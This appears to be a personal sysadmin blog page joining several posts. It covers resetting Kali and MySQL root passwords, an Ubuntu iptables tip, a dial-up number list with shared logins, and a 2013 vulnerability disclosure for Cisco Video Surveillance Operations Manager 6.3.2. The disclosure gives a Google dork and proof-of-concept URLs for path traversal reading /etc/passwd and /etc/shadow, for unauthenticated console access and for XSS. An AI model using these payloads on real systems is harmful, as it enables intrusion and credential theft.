Kali Linux reset root password

Kali

Hello bad memory

So to reset kali linux

Once grub display hit (E) to edit

add init to bin/bash

Exmple : linux /boot/vmlinuz-version root=UUID=hex ro quite init=/bin/bash

hit Ctrl + X to boot

reset the password and on some other cases you have to remount the file system to be able to write so you can simply

mount -o remount,rw /
passwd

then

sync

and reboot physical as it will not understand the /bin/bash init

Gratz.

Cisco Video Surveillance Operations Manager Multiple vulnerabilities

# Exploit Title:Cisco Video Surveillance Operations Manager Multiple vulnerabilities
# Google Dork: intitle:”Video Surveillance Operations Manager > Login”
# Date: 22 Feb 2013 reported to the vendor
# Exploit Author: Bassem | bassem.co
# Vendor Homepage: http://www.cisco.com
# Version: Version 6.3.2
# Tested on: Version 6.3.2

#1- The application is vulnerable to Local file inclusion

read_log.jsp and read_log.dep not validate the name and location of the log file , un authenticated remote attacker can perform this

#####################################################################

read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/

read_log.dep

-1 ) {
resultList.addFirst(theLine);
} else {
resultList.addLast(theLine);
}
}

POC:

http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow

#####################################################################

#2- The application is vulnerable to local file inclusion

select and display log not validate the log file names , If attacker pass /etc/passwd through the http post request system will display it as log file

POC:

http://serverip/monitor/logselect.php

#####################################################################

#3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn’t perform the proper authentication for the management and view console, Remote attacker can gain access to the system and view the attached cameras without authentication

POC:

http://serverip/broadware.jsp

#####################################################################

#4 Application is vulnerable to XSS

The web application doesn’t perform validation for the inputs/outputs for many of its pages so its vulnerable to XSS attacks

POC:

http://serverip/vsom/index.php/"/title>alert("ciscoxss");

#####################################################################

You can also find articles about this exploit below :

exploit-db
packetstorm
securelist
sectechno

Reset MYSQL root password

Reset Mysql Root Password

mysql1

Congratulations…, You are not the only one who have bad memory on this planet …

This is for LINUX users only …

stop the service :

shell>/etc/init.d/mysql stop

create file on tmp with contain the below:

UPDATE mysql.user SET Password=PASSWORD(‘basem’) WHERE User=’root’;
FLUSH PRIVILEGES;

Now start the service with the file
shell> mysqld_safe –init-file=/tmp/thefile

remove the file , and your password is basem

 

#Syria dial up

+390144422424
+390426912424
+3909221902424
+390173392424
+390182222424
+3909241962424
+3901311982424
+390719382424
+390883052424
+3901651952424
+3905751852424
+390322422424
+390736582424
+3901411912424
+46850009990
+492317299993
+4953160941030 user:telecomix pw:telecomix
+33172890150 login:toto pw:toto
Madird : +34 912910230
This will be udpated

Ubunto Server Make Firewall Rules Persist

Aly my friend was facing problem yesterday with his Ubuntu server iptables rules . after editing the rules it flushed every time after reboot.

Ubunto-Server

This is normal behavior for Ubuntu server but what if we need to make these rules persist after reboot , we tried many things , for me in RHEL it is piece of cake you just save it😀

#/etc/init.d/iptables save

But with Ubuntu its little bit different , I made simple script to restore it from config file iun rc.local but it failed , and another script to start it after start the network service and it also failed.

So i used the easy way to handle such issues .. Just insert your rules on the active file for the iptables and no way to flush it.

– save your rules

#cat iptables.rules and it should contain your save one if not just save it
#cat iptables.rules > iptables.up.rules
#cat iptables.rules > /var/lib/iptables/active

#Viva Redhat🙂